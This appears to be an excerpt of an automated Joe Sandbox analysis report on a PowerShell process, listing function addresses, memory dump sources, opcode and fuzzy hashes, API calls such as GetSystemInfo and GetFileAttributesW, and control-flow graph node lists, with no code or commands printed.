                                                                                                                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                                                                                                                        • Opcode ID: 4733f4e2309598a7f25ef9bebb29af77e485bd5921d68e52969f4fefbfa20286
                                                                                                                                                                                                                                                                                                                                                        • Instruction ID: 6fd0981e816fe0b1b5845dd68f741ac2713764c74a51bc880ccc118bee70abc8
                                                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 4733f4e2309598a7f25ef9bebb29af77e485bd5921d68e52969f4fefbfa20286
                                                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 9711C42171DE1A1FFB88E65DE451BB6A3C1EB64360F004279E10ED62E2ED19FC828780
                                                                                                                                                                                                                                                                                                                                                        Function 00007FFEB37A5EA5 Relevance: .1, Instructions: 64COMMON
                                                                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                        • Source File: 00000014.00000002.2895942618.00007FFEB37A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFEB37A0000, based on PE: false
                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_20_2_7ffeb37a0000_powershell.jbxd
                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                                                                                                                        • Opcode ID: 979061a429c47ea2236cd7bb6b58ea876b27470f2869e095e68e2972ac70fcb3
                                                                                                                                                                                                                                                                                                                                                        • Instruction ID: 911b52a923781decebc9c5930d9a3a6da4ffa27c9d81e666030a66c061154342
                                                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 979061a429c47ea2236cd7bb6b58ea876b27470f2869e095e68e2972ac70fcb3
                                                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 3A11E91061EB881FE3D9D66888957773AD5EF69310F4842BDD18DC71E3DD18AC05C751
                                                                                                                                                                                                                                                                                                                                                        Function 00007FFEB37A5FDC Relevance: .0, Instructions: 44COMMON
                                                                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                        • Source File: 00000014.00000002.2895942618.00007FFEB37A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFEB37A0000, based on PE: false
                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_20_2_7ffeb37a0000_powershell.jbxd
                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                                                                                                                        • Opcode ID: ee0ee16b35b3ab51b41d5a2e46c3d1ec6c43e61aac63475a71e9bbc2e78f44cf
                                                                                                                                                                                                                                                                                                                                                        • Instruction ID: b95511115f693aaee0277e81858bf1af88ec2741fd44e152060c1fb6695bb558
                                                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: ee0ee16b35b3ab51b41d5a2e46c3d1ec6c43e61aac63475a71e9bbc2e78f44cf
                                                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 8EF02736B1CB280EE318BA2C74431FAB3C1EB8A231F10437FD58AD2197EE1A684301C5
                                                                                                                                                                                                                                                                                                                                                        Function 00007FFEB37A8040 Relevance: .0, Instructions: 31COMMON
                                                                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                        • Source File: 00000014.00000002.2895942618.00007FFEB37A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFEB37A0000, based on PE: false
                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_20_2_7ffeb37a0000_powershell.jbxd
                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                                                                                                                        • Opcode ID: b9ee8691ee29ceba2b5790d1f4da2a9135ef91a7f2ddbc82f87a399edbca0b4a
                                                                                                                                                                                                                                                                                                                                                        • Instruction ID: 4eaa4d2ee5c45c973fcc6b514131dfdafdcbe6e1c37938016268ac08fc76d813
                                                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: b9ee8691ee29ceba2b5790d1f4da2a9135ef91a7f2ddbc82f87a399edbca0b4a
                                                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: BFF0A011A0DA5B5EFB90A62C48162772BC2FF79310F4802B9E90CE72E2EE0C78418781
                                                                                                                                                                                                                                                                                                                                                        Function 00007FFEB37A803C Relevance: .0, Instructions: 27COMMON
                                                                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                        • Source File: 00000014.00000002.2895942618.00007FFEB37A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFEB37A0000, based on PE: false
                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_20_2_7ffeb37a0000_powershell.jbxd
                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                                                                                                                        • Opcode ID: 7f782e41bf91e0bab3a5c3a60eda90cd5f988452587553ed1167d3943431c413
                                                                                                                                                                                                                                                                                                                                                        • Instruction ID: 93766255fe751b3f4f395682cf64838752ad4883462952bbd3caafcfcec977ed
                                                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 7f782e41bf91e0bab3a5c3a60eda90cd5f988452587553ed1167d3943431c413
                                                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 00E01A10B29E1E9BF6A48A5CA45163765C2FBA8740F9402B8A90DE72E5EE18FC004681
                                                                                                                                                                                                                                                                                                                                                        Function 00007FFEB37A5F9C Relevance: .0, Instructions: 26COMMON
                                                                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                        • Source File: 00000014.00000002.2895942618.00007FFEB37A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFEB37A0000, based on PE: false
                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_20_2_7ffeb37a0000_powershell.jbxd
                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                                                                                                                        • Opcode ID: af55d5a60d12a1346481e9e89880477f6392662010e6dd71d3c11590162679ed
                                                                                                                                                                                                                                                                                                                                                        • Instruction ID: a08d3bb59300a5750d40905a7d6fbb1689b2d19c6983bffd3e732a753776f069
                                                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: af55d5a60d12a1346481e9e89880477f6392662010e6dd71d3c11590162679ed
                                                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 5CE04871B1EE454EA24AE72D546217973C2FF9A7017940278F18ED36F6CE2868424285
                                                                                                                                                                                                                                                                                                                                                        Function 00007FFEB37A60EE Relevance: .0, Instructions: 22COMMON
                                                                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                        • Source File: 00000014.00000002.2895942618.00007FFEB37A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFEB37A0000, based on PE: false
                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_20_2_7ffeb37a0000_powershell.jbxd
                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                                                                                                                        • Opcode ID: 179fce80d784939ea7438000e50f1f3ef4cedad176bc7db295159804cf33545b
                                                                                                                                                                                                                                                                                                                                                        • Instruction ID: ad3060639b8de809a144180656060d3d14d5fc38339c7e3572191de324ae5d20
                                                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 179fce80d784939ea7438000e50f1f3ef4cedad176bc7db295159804cf33545b
                                                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 9DE0C21175E60E2DF694A22CF8633B66A81EF60224F8427BBE298D14E3ED0E54894242
                                                                                                                                                                                                                                                                                                                                                        Function 00007FFEB3AE615B Relevance: .0, Instructions: 21COMMON
                                                                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                        • Source File: 00000014.00000002.2917696656.00007FFEB3AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFEB3AE0000, based on PE: false
                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_20_2_7ffeb3ae0000_powershell.jbxd
                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                                                                                                                        • Opcode ID: 57fda6768e7f5776c6aad832bec9641d3623a14ecc1099dea951a46fcf730cc4
                                                                                                                                                                                                                                                                                                                                                        • Instruction ID: defa0cc0943aac919fc3eee78539d3885b82af8ddbb337b3fade22cf301f2159
                                                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 57fda6768e7f5776c6aad832bec9641d3623a14ecc1099dea951a46fcf730cc4
                                                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 13D0A702F1CC1E4FA7D1B52CF8567E953C6DBE8670B6C0762D80CC3256E8199C9207C1
                                                                                                                                                                                                                                                                                                                                                        Function 00007FFEB37A609C Relevance: .0, Instructions: 19COMMON
                                                                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                        • Source File: 00000014.00000002.2895942618.00007FFEB37A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFEB37A0000, based on PE: false
                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_20_2_7ffeb37a0000_powershell.jbxd
                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                                                                                                                        • Opcode ID: e1fa4caa191ae24c79c7ba12ed946cf826a4ed0caf09b9be471284ff55509e29
                                                                                                                                                                                                                                                                                                                                                        • Instruction ID: e4ef34cdd3ee3cf4c07266dc2bf8936cb3ef882d6b82ddd2156f61794f750d2e
                                                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: e1fa4caa191ae24c79c7ba12ed946cf826a4ed0caf09b9be471284ff55509e29
                                                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 56D02B2274D5071ED704035C78923F6AB50EF12324F4416B6E58881187CA0B5042E381
                                                                                                                                                                                                                                                                                                                                                        Function 00007FFEB3AE36E4 Relevance: .0, Instructions: 18COMMON
                                                                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                        • Source File: 00000014.00000002.2917696656.00007FFEB3AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFEB3AE0000, based on PE: false
                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_20_2_7ffeb3ae0000_powershell.jbxd
                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                                                                                                                        • Opcode ID: 25ddc88aed1123fcb0a05180b6972e60df4691aaff3157263351311a07940dde
                                                                                                                                                                                                                                                                                                                                                        • Instruction ID: c3b026cc3af68f4f70068e407ed399e316a1f2390ff58a5874f11245f2bde021
                                                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 25ddc88aed1123fcb0a05180b6972e60df4691aaff3157263351311a07940dde
                                                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: C0D0A700F0DA9D1F9A55E27D102319EAED3CF94940B5843BDD48BE35EFCD08480243C5

                                                                                                                                                                                                                                                                                                                                                        Execution Graph

                                                                                                                                                                                                                                                                                                                                                        Execution Coverage:4.6%
                                                                                                                                                                                                                                                                                                                                                        Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                                                                                                                                                                        Signature Coverage:0%
                                                                                                                                                                                                                                                                                                                                                        Total number of Nodes:14
                                                                                                                                                                                                                                                                                                                                                        Total number of Limit Nodes:1
                                                                                                                                                                                                                                                                                                                                                        execution_graph 6567 7ffeb3169e91 6568 7ffeb3169e9f GetFileAttributesW 6567->6568 6570 7ffeb3169f46 6568->6570 6558 7ffeb3164c60 6559 7ffeb3164c6c 6558->6559 6562 7ffeb3164928 6559->6562 6561 7ffeb3164cdf 6563 7ffeb316492d 6562->6563 6564 7ffeb31742a3 GetSystemInfo 6563->6564 6566 7ffeb3174210 6563->6566 6565 7ffeb31742de 6564->6565 6565->6561 6566->6561 6571 7ffeb316ac9b 6572 7ffeb3173bf0 ComputeAccessTokenFromCodeAuthzLevel 6571->6572 6574 7ffeb3173c9e 6572->6574

                                                                                                                                                                                                                                                                                                                                                        Executed Functions

                                                                                                                                                                                                                                                                                                                                                        Function 00007FFEB3795103 Relevance: 1.7, Strings: 1, Instructions: 475COMMON
                                                                                                                                                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                                                                                                                                        control_flow_graph 0 7ffeb3795103-7ffeb3795111 2 7ffeb3795206-7ffeb379520f 0->2 3 7ffeb3795112-7ffeb379511e 0->3 4 7ffeb3795269-7ffeb37952a1 2->4 5 7ffeb3795211-7ffeb3795212 2->5 6 7ffeb379516d-7ffeb3795189 3->6 7 7ffeb379511f-7ffeb3795129 3->7 17 7ffeb37952bd 4->17 18 7ffeb37952a3-7ffeb37952a8 4->18 5->4 9 7ffeb3795190-7ffeb379519e 6->9 8 7ffeb379512b-7ffeb379512c 7->8 7->9 8->6 12 7ffeb37951a5-7ffeb37951ab 9->12 13 7ffeb37951cd-7ffeb37951d3 12->13 14 7ffeb37951ad-7ffeb37951c1 12->14 19 7ffeb37951e0-7ffeb37951ec 13->19 20 7ffeb37951d5-7ffeb37951de 13->20 16 7ffeb37951c3-7ffeb37951c8 14->16 21 7ffeb37950d6-7ffeb37950dd 16->21 25 7ffeb37952c2-7ffeb37952cf 17->25 22 7ffeb37952b9-7ffeb37952bb 18->22 23 7ffeb37952aa-7ffeb37952b7 18->23 24 7ffeb37951ed-7ffeb37951ff 19->24 20->24 30 7ffeb37950e3-7ffeb37950e7 21->30 22->25 23->17 23->22 24->2 26 7ffeb3794fd8-7ffeb3794fe0 25->26 27 7ffeb37952d5-7ffeb37952df 25->27 28 7ffeb3794ff1-7ffeb3794ff8 26->28 29 7ffeb3794fe2-7ffeb3794fe7 26->29 37 7ffeb379531a-7ffeb3795321 27->37 34 7ffeb37953ed-7ffeb3795432 28->34 35 7ffeb3794ffe-7ffeb3795009 28->35 29->28 36 7ffeb37950e8-7ffeb37950f3 30->36 58 7ffeb3795438-7ffeb379543a 34->58 59 7ffeb379550a-7ffeb3795514 34->59 38 7ffeb37953df-7ffeb37953ec 35->38 39 7ffeb379500f-7ffeb3795025 35->39 42 7ffeb37950fa-7ffeb37950fb 36->42 40 7ffeb37952e1-7ffeb37952e8 37->40 41 7ffeb3795323-7ffeb3795333 37->41 38->34 51 7ffeb3795027-7ffeb379502a 39->51 52 7ffeb379507e 39->52 44 7ffeb37952f9-7ffeb3795300 40->44 45 7ffeb37952ea-7ffeb37952ef 40->45 48 7ffeb37950ff-7ffeb3795102 42->48 44->34 50 7ffeb3795306-7ffeb3795318 44->50 45->44 48->0 50->37 56 7ffeb37950ab-7ffeb37950b5 51->56 57 7ffeb379502c-7ffeb3795034 51->57 52->48 54 7ffeb3795080-7ffeb3795083 52->54 62 7ffeb37950a5-7ffeb37950a9 54->62 63 7ffeb3795085-7ffeb379508a 54->63 56->16 66 7ffeb37950ba-7ffeb37950bb 56->66 64 7ffeb3795036-7ffeb3795039 57->64 65 7ffeb379508d-7ffeb379508f 57->65 60 7ffeb37954f8-7ffeb3795504 58->60 60->59 67 7ffeb379543f-7ffeb3795444 60->67 62->56 63->65 64->66 69 7ffeb379503b-7ffeb379504d 64->69 65->42 68 7ffeb3795091-7ffeb3795092 65->68 70 7ffeb37950be-7ffeb37950cb 66->70 71 7ffeb3795446-7ffeb379544b 67->71 72 7ffeb3795455-7ffeb379545c 67->72 68->62 69->70 77 7ffeb379504f-7ffeb3795054 69->77 78 7ffeb37950cc-7ffeb37950d2 70->78 71->72 74 7ffeb3795462-7ffeb3795473 72->74 75 7ffeb3795515-7ffeb3795529 72->75 79 7ffeb37954cc-7ffeb37954d5 74->79 80 7ffeb3795475-7ffeb3795476 74->80 87 7ffeb379552b 75->87 88 7ffeb379552d-7ffeb379556b 75->88 81 7ffeb3795056-7ffeb379505b 77->81 82 7ffeb37950d5 77->82 78->82 84 7ffeb37954d7-7ffeb37954db 79->84 85 7ffeb37954dd 79->85 80->79 81->78 86 7ffeb379505d-7ffeb3795062 81->86 82->21 89 7ffeb37954e2-7ffeb37954e4 84->89 85->89 86->30 90 7ffeb3795064-7ffeb3795077 86->90 87->88 91 7ffeb379556d-7ffeb379558b 87->91 88->91 93 7ffeb37954f6 89->93 94 7ffeb37954e6-7ffeb37954ef 89->94 90->36 97 7ffeb3795079-7ffeb379507c 90->97 93->60 94->93 97->52
                                                                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                        • Source File: 00000023.00000002.2320397532.00007FFEB3790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFEB3790000, based on PE: false
                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_35_2_7ffeb3790000_powershell.jbxd
                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                                                                                                        • String ID: AVWV
                                                                                                                                                                                                                                                                                                                                                        • API String ID: 0-489655572
                                                                                                                                                                                                                                                                                                                                                        • Opcode ID: 82d3a61ee63dc048d7ec10e5a3d8a25c11dd6ec4ae9753de3c4b22faf2d8ce8e
                                                                                                                                                                                                                                                                                                                                                        • Instruction ID: 88768fc398b3da014b1b84061ada70fbf24b43ea0079b2a6fd2d8cfbe3352489
                                                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 82d3a61ee63dc048d7ec10e5a3d8a25c11dd6ec4ae9753de3c4b22faf2d8ce8e
                                                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 09F1583090EA5A5FE758DB2C84466B677E2EF65310F1407BDD18E8B1E3DE28B846C781
                                                                                                                                                                                                                                                                                                                                                        Function 00007FFEB3164928 Relevance: 1.6, APIs: 1, Instructions: 148COMMON
                                                                                                                                                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                                                                                                                                        control_flow_graph 98 7ffeb3164928-7ffeb31741e7 103 7ffeb3174231-7ffeb317424a 98->103 104 7ffeb31741e9-7ffeb31741fd 98->104 107 7ffeb317424b-7ffeb317424f 103->107 105 7ffeb31741ff-7ffeb3174202 104->105 106 7ffeb3174256-7ffeb3174281 104->106 108 7ffeb3174204-7ffeb3174206 105->108 109 7ffeb3174283-7ffeb3174287 105->109 113 7ffeb3174282 106->113 115 7ffeb3174251-7ffeb3174255 107->115 108->113 114 7ffeb3174208 108->114 112 7ffeb3174288-7ffeb31742dc GetSystemInfo 109->112 119 7ffeb31742e4-7ffeb3174300 112->119 120 7ffeb31742de 112->120 113->109 114->107 116 7ffeb317420a-7ffeb317420c 114->116 115->106 116->112 118 7ffeb317420e 116->118 118->115 121 7ffeb3174210-7ffeb317422c call 7ffeb3172dc0 118->121 120->119
                                                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                        • Source File: 00000023.00000002.2288103168.00007FFEB3160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFEB3160000, based on PE: false
                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_35_2_7ffeb3160000_powershell.jbxd
                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                        • API ID: InfoSystem
                                                                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                                                                        • API String ID: 31276548-0
                                                                                                                                                                                                                                                                                                                                                        • Opcode ID: 2a4b1fc8d6fe90217279a71b420f54acb561c7b3d6911549b33c527bada4b814
                                                                                                                                                                                                                                                                                                                                                        • Instruction ID: ade3d37e9263aa89565eed924255f2d1e9589cb53dc02ad14b021347add08ec0
                                                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 2a4b1fc8d6fe90217279a71b420f54acb561c7b3d6911549b33c527bada4b814
                                                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 0F411571D0CA4C8FE764DB6C98066F97BE0FF69320F04022BD14DE3191DF6564568B81
                                                                                                                                                                                                                                                                                                                                                        Function 00007FFEB316AC9B Relevance: 1.6, APIs: 1, Instructions: 120COMMON
                                                                                                                                                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                                                                                                                                        control_flow_graph 124 7ffeb316ac9b-7ffeb3173c9c ComputeAccessTokenFromCodeAuthzLevel 128 7ffeb3173ca4-7ffeb3173cd3 124->128 129 7ffeb3173c9e 124->129 129->128
                                                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                        • Source File: 00000023.00000002.2288103168.00007FFEB3160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFEB3160000, based on PE: false
                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_35_2_7ffeb3160000_powershell.jbxd
                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                        • API ID: AccessAuthzCodeComputeFromLevelToken
                                                                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                                                                        • API String ID: 132034935-0
                                                                                                                                                                                                                                                                                                                                                        • Opcode ID: f97a138c6fcfb3999f8e09c2c1172d6f510828e6686c7ca8f449fb2d2186ed71
                                                                                                                                                                                                                                                                                                                                                        • Instruction ID: da47a2b543856803896ccdb6ba584ae70f5af0a7fbc2509e0c5ae045c83009cc
                                                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: f97a138c6fcfb3999f8e09c2c1172d6f510828e6686c7ca8f449fb2d2186ed71
                                                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 4A318571908A1C8FDB18DB5CD8456F9B7E1FB59321F04422FD04AE3251DB74A8568BC1
                                                                                                                                                                                                                                                                                                                                                        Function 00007FFEB3169E91 Relevance: 1.6, APIs: 1, Instructions: 109COMMON
                                                                                                                                                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                                                                                                                                        control_flow_graph 131 7ffeb3169e91-7ffeb3169e9d 132 7ffeb3169ea1-7ffeb3169eda 131->132 133 7ffeb3169e9f 131->133 134 7ffeb3169ee1-7ffeb3169f08 132->134 133->132 133->134 137 7ffeb3169f12-7ffeb3169f44 GetFileAttributesW 134->137 138 7ffeb3169f0a-7ffeb3169f0f 134->138 139 7ffeb3169f4c-7ffeb3169f71 137->139 140 7ffeb3169f46 137->140 138->137 140->139
                                                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                        • Source File: 00000023.00000002.2288103168.00007FFEB3160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFEB3160000, based on PE: false
                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_35_2_7ffeb3160000_powershell.jbxd
                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                        • API ID: AttributesFile
                                                                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                                                                        • API String ID: 3188754299-0
                                                                                                                                                                                                                                                                                                                                                        • Opcode ID: b5516ba00ce57f97ca258ba270cfbf8e27b379ee55fca9a13d07349f25e216ba
                                                                                                                                                                                                                                                                                                                                                        • Instruction ID: b5eaa70a5020c62f3c630a6c9e9c2b7deccfbb9b6f15232e7434407d8910edbc
                                                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: b5516ba00ce57f97ca258ba270cfbf8e27b379ee55fca9a13d07349f25e216ba
                                                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: E131A13190CA4C8FDB59DFA88849AF9BFF0EF66321F14426FD049D3662DB646805CB81
                                                                                                                                                                                                                                                                                                                                                        Function 00007FFEB3168C7B Relevance: 1.6, APIs: 1, Instructions: 102COMMON
                                                                                                                                                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                                                                                                                                        control_flow_graph 142 7ffeb3168c7b-7ffeb3169f08 146 7ffeb3169f12-7ffeb3169f44 GetFileAttributesW 142->146 147 7ffeb3169f0a-7ffeb3169f0f 142->147 148 7ffeb3169f4c-7ffeb3169f71 146->148 149 7ffeb3169f46 146->149 147->146 149->148
                                                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                        • Source File: 00000023.00000002.2288103168.00007FFEB3160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFEB3160000, based on PE: false
                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_35_2_7ffeb3160000_powershell.jbxd
                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                        • API ID: AttributesFile
                                                                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                                                                        • API String ID: 3188754299-0
                                                                                                                                                                                                                                                                                                                                                        • Opcode ID: 6fed41d74bfa81da25edd7feafdfb3a3b4539e4c25a85360b45ac8d82a4a79da
                                                                                                                                                                                                                                                                                                                                                        • Instruction ID: 3f44128ccc4e8afa1e51855ab5396204a4b11b038b33c013fd36a4dbdb534fe5
                                                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 6fed41d74bfa81da25edd7feafdfb3a3b4539e4c25a85360b45ac8d82a4a79da
                                                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: C0318471908A1C9FDB58DF9CC849AF9BBE0FF65321F10426FD009E3652DB7468158B91
